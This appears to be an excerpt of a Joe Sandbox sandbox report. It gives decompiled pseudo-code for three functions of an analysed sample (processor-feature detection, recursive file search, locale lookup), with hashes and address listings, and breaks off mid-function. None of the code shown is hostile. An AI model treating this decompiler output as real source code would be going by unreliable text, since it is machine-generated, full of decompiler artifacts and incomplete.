                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                          • Opcode ID: a53a696e7c748c3b93b62d2e9ddb890299a7c71ee2aedb8127e1fb4427f5d8f5
                                                                                                                                                                          • Instruction ID: 9cd413dc8d4241a0ba2603e5ac386cf1714db7ccb56ecaa7bf3d5c2a94142919
                                                                                                                                                                          • Opcode Fuzzy Hash: a53a696e7c748c3b93b62d2e9ddb890299a7c71ee2aedb8127e1fb4427f5d8f5
                                                                                                                                                                          • Instruction Fuzzy Hash: 81B149B16106089FD714CF28D486B657BE0FF493A5F258658EADACF2E1C335E992CB40
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009F9415 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                          			E009F9415(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0xa45e64 =  *0xa45e64 & 0x00000000;
				 *0xa44bc0 =  *0xa44bc0 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v12 = _v28 ^ 0x49656e69;
				_v8 = _v36 ^ 0x756e6547;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
					L9:
					_t96 =  *0xa45e68; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0xa45e68 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0xa44bc0; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0xa45e64 = 1;
					 *0xa44bc0 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0xa45e64 = 2;
						 *0xa44bc0 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0xa44bc0; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0xa45e64 = 3;
								 *0xa44bc0 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0xa45e64 = 5;
									 *0xa44bc0 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0xa44bc0 =  *0xa44bc0 | 0x00000040;
										 *0xa45e64 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0xa45e68; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0xa45e68 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}






























                                                                                                                                                                          0x009f9415
                                                                                                                                                                          0x009f9418
                                                                                                                                                                          0x009f9422
                                                                                                                                                                          0x009f9433
                                                                                                                                                                          0x009f95e2
                                                                                                                                                                          0x009f95e5
                                                                                                                                                                          0x009f95e5
                                                                                                                                                                          0x009f9439
                                                                                                                                                                          0x009f943f
                                                                                                                                                                          0x009f9444
                                                                                                                                                                          0x009f9448
                                                                                                                                                                          0x009f944c
                                                                                                                                                                          0x009f944d
                                                                                                                                                                          0x009f944f
                                                                                                                                                                          0x009f9452
                                                                                                                                                                          0x009f9457
                                                                                                                                                                          0x009f9460
                                                                                                                                                                          0x009f9471
                                                                                                                                                                          0x009f947c
                                                                                                                                                                          0x009f9482
                                                                                                                                                                          0x009f9483
                                                                                                                                                                          0x009f9488
                                                                                                                                                                          0x009f948b
                                                                                                                                                                          0x009f9490
                                                                                                                                                                          0x009f9498
                                                                                                                                                                          0x009f949b
                                                                                                                                                                          0x009f949e
                                                                                                                                                                          0x009f94e3
                                                                                                                                                                          0x009f94e3
                                                                                                                                                                          0x009f94e9
                                                                                                                                                                          0x009f94e9
                                                                                                                                                                          0x009f94ee
                                                                                                                                                                          0x009f94ef
                                                                                                                                                                          0x009f94f5
                                                                                                                                                                          0x009f9526
                                                                                                                                                                          0x009f94f7
                                                                                                                                                                          0x009f94f9
                                                                                                                                                                          0x009f94fa
                                                                                                                                                                          0x009f94ff
                                                                                                                                                                          0x009f9502
                                                                                                                                                                          0x009f9504
                                                                                                                                                                          0x009f9507
                                                                                                                                                                          0x009f950a
                                                                                                                                                                          0x009f950d
                                                                                                                                                                          0x009f9510
                                                                                                                                                                          0x009f9519
                                                                                                                                                                          0x009f951e
                                                                                                                                                                          0x009f951e
                                                                                                                                                                          0x009f9519
                                                                                                                                                                          0x009f9529
                                                                                                                                                                          0x009f952e
                                                                                                                                                                          0x009f9531
                                                                                                                                                                          0x009f953b
                                                                                                                                                                          0x009f9546
                                                                                                                                                                          0x009f954c
                                                                                                                                                                          0x009f954f
                                                                                                                                                                          0x009f9559
                                                                                                                                                                          0x009f9564
                                                                                                                                                                          0x009f9570
                                                                                                                                                                          0x009f9573
                                                                                                                                                                          0x009f9576
                                                                                                                                                                          0x009f9581
                                                                                                                                                                          0x009f9586
                                                                                                                                                                          0x009f9588
                                                                                                                                                                          0x009f958d
                                                                                                                                                                          0x009f9590
                                                                                                                                                                          0x009f959a
                                                                                                                                                                          0x009f95a2
                                                                                                                                                                          0x009f95a7
                                                                                                                                                                          0x009f95b1
                                                                                                                                                                          0x009f95bf
                                                                                                                                                                          0x009f95d2
                                                                                                                                                                          0x009f95d9
                                                                                                                                                                          0x009f95d9
                                                                                                                                                                          0x009f95bf
                                                                                                                                                                          0x009f95a2
                                                                                                                                                                          0x009f9586
                                                                                                                                                                          0x009f9564
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f95e1
                                                                                                                                                                          0x009f94a3
                                                                                                                                                                          0x009f94ad
                                                                                                                                                                          0x009f94d2
                                                                                                                                                                          0x009f94d8
                                                                                                                                                                          0x009f94db
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 009F942B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                          • Opcode ID: f964833c5e7c2496760f476b58a51db94c54b1f68b2bdd8ce43256d01c63e1ac
                                                                                                                                                                          • Instruction ID: da49abe843886db7130532c785fd6961dee295d90daf9ac10df195d55eef9af1
                                                                                                                                                                          • Opcode Fuzzy Hash: f964833c5e7c2496760f476b58a51db94c54b1f68b2bdd8ce43256d01c63e1ac
                                                                                                                                                                          • Instruction Fuzzy Hash: 3251AEB9E14619CFDB15CFA5E8817AAB7F4FB88310F28852AD905EB260D375DD02CB50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0B794 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                          			E00A0B794(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				void* __ebx;
				void* __edi;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				union _FINDEX_INFO_LEVELS _t100;
				intOrPtr* _t106;
				signed int _t109;
				intOrPtr _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				void* _t126;
				union _FINDEX_INFO_LEVELS _t127;
				void* _t128;
				intOrPtr* _t130;
				intOrPtr* _t133;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t143;
				signed int _t149;
				void* _t155;
				signed int _t158;
				intOrPtr _t160;
				void* _t161;
				void* _t165;
				void* _t166;
				signed int _t167;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t173;
				void* _t174;

				_push(__ecx);
				_t133 = _a4;
				_t2 = _t133 + 1; // 0x1
				_t155 = _t2;
				do {
					_t68 =  *_t133;
					_t133 = _t133 + 1;
				} while (_t68 != 0);
				_t158 = _a12;
				_t135 = _t133 - _t155 + 1;
				_v8 = _t135;
				if(_t135 <=  !_t158) {
					_push(__esi);
					_t5 = _t158 + 1; // 0x1
					_t126 = _t5 + _t135;
					_t165 = E00A04422(_t126, 1);
					__eflags = _t158;
					if(_t158 == 0) {
						L7:
						_push(_v8);
						_t126 = _t126 - _t158;
						_t73 = E00A1106E(_t165 + _t158, _t126, _a4);
						_t172 = _t171 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t130 = _a16;
							_t118 = E00A0BAD8(_t130);
							_v8 = _t118;
							__eflags = _t118;
							if(_t118 == 0) {
								 *( *(_t130 + 4)) = _t165;
								_t167 = 0;
								_t14 = _t130 + 4;
								 *_t14 =  *(_t130 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E00A0447F(_t165);
								_t167 = _v8;
							}
							E00A0447F(0);
							_t121 = _t167;
							goto L4;
						}
					} else {
						_push(_t158);
						_t123 = E00A1106E(_t165, _t126, _a8);
						_t172 = _t171 + 0x10;
						__eflags = _t123;
						if(_t123 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E009FCBFC();
							asm("int3");
							_t170 = _t172;
							_t173 = _t172 - 0x298;
							_t75 =  *0xa44bac; // 0x96877b9b
							_v48 = _t75 ^ _t170;
							_t138 = _v32;
							_t156 = _v28;
							_push(_t126);
							_push(0);
							_t160 = _v36;
							_v648 = _t156;
							__eflags = _t138 - _t160;
							if(_t138 != _t160) {
								while(1) {
									_t116 =  *_t138;
									__eflags = _t116 - 0x2f;
									if(_t116 == 0x2f) {
										break;
									}
									__eflags = _t116 - 0x5c;
									if(_t116 != 0x5c) {
										__eflags = _t116 - 0x3a;
										if(_t116 != 0x3a) {
											_t138 = E00A11F80(_t160, _t138);
											__eflags = _t138 - _t160;
											if(_t138 != _t160) {
												continue;
											}
										}
									}
									break;
								}
								_t156 = _v612;
							}
							_t77 =  *_t138;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t127 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t127;
								_v668 = _t127;
								_push(_t165);
								asm("sbb eax, eax");
								_v664 = _t127;
								_v660 = _t127;
								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
								_v656 = _t127;
								_v652 = _t127;
								_t84 = E00A008FB(_t138 - _t160 + 1, _t160,  &_v672, E00A0B2FA(_t156, __eflags));
								_t174 = _t173 + 0xc;
								asm("sbb eax, eax");
								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
								__eflags = _t166 - 0xffffffff;
								if(_t166 != 0xffffffff) {
									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t143;
									_t144 = _t143 >> 2;
									_v644 = _t143 >> 2;
									do {
										_v636 = _t127;
										_v632 = _t127;
										_v628 = _t127;
										_v624 = _t127;
										_v620 = _t127;
										_v616 = _t127;
										_t94 = E00A0B4D6( &(_v604.cFileName),  &_v636,  &_v605, E00A0B2FA(_t156, __eflags));
										_t174 = _t174 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E00A0B794(_t144, _t166, _t97, _t160, _v640);
											_t174 = _t174 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t127;
												if(_v616 != _t127) {
													E00A0447F(_v628);
													_t98 = _v648;
												}
												_t127 = _t98;
											} else {
												goto L35;
											}
										} else {
											_t144 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t144;
											if(_t144 == 0) {
												goto L35;
											} else {
												__eflags = _t144 - 0x2e;
												if(_t144 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t166);
										goto L44;
										L35:
										__eflags = _v616 - _t127;
										if(_v616 != _t127) {
											E00A0447F(_v628);
											_pop(_t144);
										}
										__eflags = FindNextFileW(_t166,  &_v604);
									} while (__eflags != 0);
									_t106 = _v612;
									_t149 = _v644;
									_t156 =  *_t106;
									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
									__eflags = _t149 - _t109;
									if(_t149 != _t109) {
										E00A11A50(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E00A0B4BE);
									}
									goto L43;
								} else {
									_push(_v612);
									_t127 = E00A0B794( &_v604, _t166, _t160, _t127, _t127);
								}
								L44:
								__eflags = _v652;
								_pop(_t165);
								if(_v652 != 0) {
									E00A0447F(_v664);
								}
								_t100 = _t127;
							} else {
								__eflags = _t138 - _t160 + 1;
								if(_t138 == _t160 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t156);
									_t100 = E00A0B794(_t138, _t165, _t160, 0, 0);
								}
							}
							_pop(_t161);
							__eflags = _v12 ^ _t170;
							_pop(_t128);
							return E009F8F7D(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
						} else {
							goto L7;
						}
					}
				} else {
					_t121 = 0xc;
					L4:
					return _t121;
				}
			}


































































                                                                                                                                                                          0x00a0b799
                                                                                                                                                                          0x00a0b79a
                                                                                                                                                                          0x00a0b79d
                                                                                                                                                                          0x00a0b79d
                                                                                                                                                                          0x00a0b7a0
                                                                                                                                                                          0x00a0b7a0
                                                                                                                                                                          0x00a0b7a2
                                                                                                                                                                          0x00a0b7a3
                                                                                                                                                                          0x00a0b7a8
                                                                                                                                                                          0x00a0b7af
                                                                                                                                                                          0x00a0b7b2
                                                                                                                                                                          0x00a0b7b7
                                                                                                                                                                          0x00a0b7c0
                                                                                                                                                                          0x00a0b7c1
                                                                                                                                                                          0x00a0b7c4
                                                                                                                                                                          0x00a0b7ce
                                                                                                                                                                          0x00a0b7d2
                                                                                                                                                                          0x00a0b7d4
                                                                                                                                                                          0x00a0b7e8
                                                                                                                                                                          0x00a0b7e8
                                                                                                                                                                          0x00a0b7eb
                                                                                                                                                                          0x00a0b7f5
                                                                                                                                                                          0x00a0b7fa
                                                                                                                                                                          0x00a0b7fd
                                                                                                                                                                          0x00a0b7ff
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b801
                                                                                                                                                                          0x00a0b801
                                                                                                                                                                          0x00a0b806
                                                                                                                                                                          0x00a0b80d
                                                                                                                                                                          0x00a0b810
                                                                                                                                                                          0x00a0b812
                                                                                                                                                                          0x00a0b823
                                                                                                                                                                          0x00a0b825
                                                                                                                                                                          0x00a0b827
                                                                                                                                                                          0x00a0b827
                                                                                                                                                                          0x00a0b827
                                                                                                                                                                          0x00a0b814
                                                                                                                                                                          0x00a0b815
                                                                                                                                                                          0x00a0b81a
                                                                                                                                                                          0x00a0b81d
                                                                                                                                                                          0x00a0b82c
                                                                                                                                                                          0x00a0b832
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b835
                                                                                                                                                                          0x00a0b7d6
                                                                                                                                                                          0x00a0b7d6
                                                                                                                                                                          0x00a0b7dc
                                                                                                                                                                          0x00a0b7e1
                                                                                                                                                                          0x00a0b7e4
                                                                                                                                                                          0x00a0b7e6
                                                                                                                                                                          0x00a0b838
                                                                                                                                                                          0x00a0b83a
                                                                                                                                                                          0x00a0b83b
                                                                                                                                                                          0x00a0b83c
                                                                                                                                                                          0x00a0b83d
                                                                                                                                                                          0x00a0b83e
                                                                                                                                                                          0x00a0b83f
                                                                                                                                                                          0x00a0b844
                                                                                                                                                                          0x00a0b848
                                                                                                                                                                          0x00a0b84a
                                                                                                                                                                          0x00a0b850
                                                                                                                                                                          0x00a0b857
                                                                                                                                                                          0x00a0b85a
                                                                                                                                                                          0x00a0b85d
                                                                                                                                                                          0x00a0b860
                                                                                                                                                                          0x00a0b861
                                                                                                                                                                          0x00a0b862
                                                                                                                                                                          0x00a0b865
                                                                                                                                                                          0x00a0b86b
                                                                                                                                                                          0x00a0b86d
                                                                                                                                                                          0x00a0b86f
                                                                                                                                                                          0x00a0b86f
                                                                                                                                                                          0x00a0b871
                                                                                                                                                                          0x00a0b873
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b875
                                                                                                                                                                          0x00a0b877
                                                                                                                                                                          0x00a0b879
                                                                                                                                                                          0x00a0b87b
                                                                                                                                                                          0x00a0b886
                                                                                                                                                                          0x00a0b888
                                                                                                                                                                          0x00a0b88a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b88a
                                                                                                                                                                          0x00a0b87b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b877
                                                                                                                                                                          0x00a0b88c
                                                                                                                                                                          0x00a0b88c
                                                                                                                                                                          0x00a0b892
                                                                                                                                                                          0x00a0b894
                                                                                                                                                                          0x00a0b89a
                                                                                                                                                                          0x00a0b89c
                                                                                                                                                                          0x00a0b8be
                                                                                                                                                                          0x00a0b8be
                                                                                                                                                                          0x00a0b8c0
                                                                                                                                                                          0x00a0b8c2
                                                                                                                                                                          0x00a0b8ce
                                                                                                                                                                          0x00a0b8ce
                                                                                                                                                                          0x00a0b8c4
                                                                                                                                                                          0x00a0b8c4
                                                                                                                                                                          0x00a0b8c6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b8c8
                                                                                                                                                                          0x00a0b8c8
                                                                                                                                                                          0x00a0b8ca
                                                                                                                                                                          0x00a0b8cc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b8cc
                                                                                                                                                                          0x00a0b8c6
                                                                                                                                                                          0x00a0b8d6
                                                                                                                                                                          0x00a0b8de
                                                                                                                                                                          0x00a0b8e4
                                                                                                                                                                          0x00a0b8e5
                                                                                                                                                                          0x00a0b8e7
                                                                                                                                                                          0x00a0b8ef
                                                                                                                                                                          0x00a0b8f5
                                                                                                                                                                          0x00a0b8fb
                                                                                                                                                                          0x00a0b901
                                                                                                                                                                          0x00a0b915
                                                                                                                                                                          0x00a0b91a
                                                                                                                                                                          0x00a0b925
                                                                                                                                                                          0x00a0b93b
                                                                                                                                                                          0x00a0b93d
                                                                                                                                                                          0x00a0b940
                                                                                                                                                                          0x00a0b963
                                                                                                                                                                          0x00a0b963
                                                                                                                                                                          0x00a0b965
                                                                                                                                                                          0x00a0b968
                                                                                                                                                                          0x00a0b96e
                                                                                                                                                                          0x00a0b96e
                                                                                                                                                                          0x00a0b974
                                                                                                                                                                          0x00a0b97a
                                                                                                                                                                          0x00a0b980
                                                                                                                                                                          0x00a0b986
                                                                                                                                                                          0x00a0b98c
                                                                                                                                                                          0x00a0b9ad
                                                                                                                                                                          0x00a0b9b2
                                                                                                                                                                          0x00a0b9b7
                                                                                                                                                                          0x00a0b9bb
                                                                                                                                                                          0x00a0b9c1
                                                                                                                                                                          0x00a0b9c4
                                                                                                                                                                          0x00a0b9d7
                                                                                                                                                                          0x00a0b9d7
                                                                                                                                                                          0x00a0b9e5
                                                                                                                                                                          0x00a0b9ea
                                                                                                                                                                          0x00a0b9ed
                                                                                                                                                                          0x00a0b9f3
                                                                                                                                                                          0x00a0b9f5
                                                                                                                                                                          0x00a0ba53
                                                                                                                                                                          0x00a0ba59
                                                                                                                                                                          0x00a0ba61
                                                                                                                                                                          0x00a0ba66
                                                                                                                                                                          0x00a0ba6c
                                                                                                                                                                          0x00a0ba6d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b9c6
                                                                                                                                                                          0x00a0b9c6
                                                                                                                                                                          0x00a0b9c9
                                                                                                                                                                          0x00a0b9cb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b9cd
                                                                                                                                                                          0x00a0b9cd
                                                                                                                                                                          0x00a0b9d0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b9d2
                                                                                                                                                                          0x00a0b9d2
                                                                                                                                                                          0x00a0b9d5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b9d5
                                                                                                                                                                          0x00a0b9d0
                                                                                                                                                                          0x00a0b9cb
                                                                                                                                                                          0x00a0ba6f
                                                                                                                                                                          0x00a0ba70
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b9f7
                                                                                                                                                                          0x00a0b9f7
                                                                                                                                                                          0x00a0b9fd
                                                                                                                                                                          0x00a0ba05
                                                                                                                                                                          0x00a0ba0a
                                                                                                                                                                          0x00a0ba0a
                                                                                                                                                                          0x00a0ba19
                                                                                                                                                                          0x00a0ba19
                                                                                                                                                                          0x00a0ba21
                                                                                                                                                                          0x00a0ba27
                                                                                                                                                                          0x00a0ba2d
                                                                                                                                                                          0x00a0ba34
                                                                                                                                                                          0x00a0ba37
                                                                                                                                                                          0x00a0ba39
                                                                                                                                                                          0x00a0ba49
                                                                                                                                                                          0x00a0ba4e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b942
                                                                                                                                                                          0x00a0b942
                                                                                                                                                                          0x00a0b953
                                                                                                                                                                          0x00a0b953
                                                                                                                                                                          0x00a0ba76
                                                                                                                                                                          0x00a0ba76
                                                                                                                                                                          0x00a0ba7d
                                                                                                                                                                          0x00a0ba7e
                                                                                                                                                                          0x00a0ba86
                                                                                                                                                                          0x00a0ba8b
                                                                                                                                                                          0x00a0ba8c
                                                                                                                                                                          0x00a0b89e
                                                                                                                                                                          0x00a0b8a1
                                                                                                                                                                          0x00a0b8a3
                                                                                                                                                                          0x00a0b8b8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b8a5
                                                                                                                                                                          0x00a0b8a5
                                                                                                                                                                          0x00a0b8ab
                                                                                                                                                                          0x00a0b8b0
                                                                                                                                                                          0x00a0b8a3
                                                                                                                                                                          0x00a0ba91
                                                                                                                                                                          0x00a0ba92
                                                                                                                                                                          0x00a0ba94
                                                                                                                                                                          0x00a0ba9b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b7e6
                                                                                                                                                                          0x00a0b7b9
                                                                                                                                                                          0x00a0b7bb
                                                                                                                                                                          0x00a0b7bc
                                                                                                                                                                          0x00a0b7be
                                                                                                                                                                          0x00a0b7be

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0a671b59da31d5106fd3f03985e095d34415de2101b7b06c727052c6456f421f
                                                                                                                                                                          • Instruction ID: 0a2588f5d7e948fbee9753f1b93c082ebf61a83808f2611141df2907eec757c0
                                                                                                                                                                          • Opcode Fuzzy Hash: 0a671b59da31d5106fd3f03985e095d34415de2101b7b06c727052c6456f421f
                                                                                                                                                                          • Instruction Fuzzy Hash: AB41A1B580421DAFDB20DF69DD89AEABBB8AF49300F1442D9E45DD3251DB319E858F20
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0E973 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                          			E00A0E973(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t15;
				signed int _t21;
				signed int _t23;
				signed int _t30;
				signed int _t31;
				void* _t32;
				signed int _t41;
				signed int* _t47;
				int _t49;
				signed int _t50;

				_t46 = __edx;
				_t15 =  *0xa44bac; // 0x96877b9b
				_v8 = _t15 ^ _t50;
				_t32 = E00A041D0(__ecx, __edx);
				_t47 =  *(E00A041D0(__ecx, __edx) + 0x34c);
				_t49 = E00A0EA48(_a4);
				asm("sbb ecx, ecx");
				_t21 = GetLocaleInfoW(_t49, ( ~( *(_t32 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t21 != 0) {
					_t23 = E00A0B1C4(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
					_t41 =  *(_t32 + 0x60);
					__eflags = _t23;
					if(_t23 != 0) {
						__eflags = _t41;
						if(_t41 == 0) {
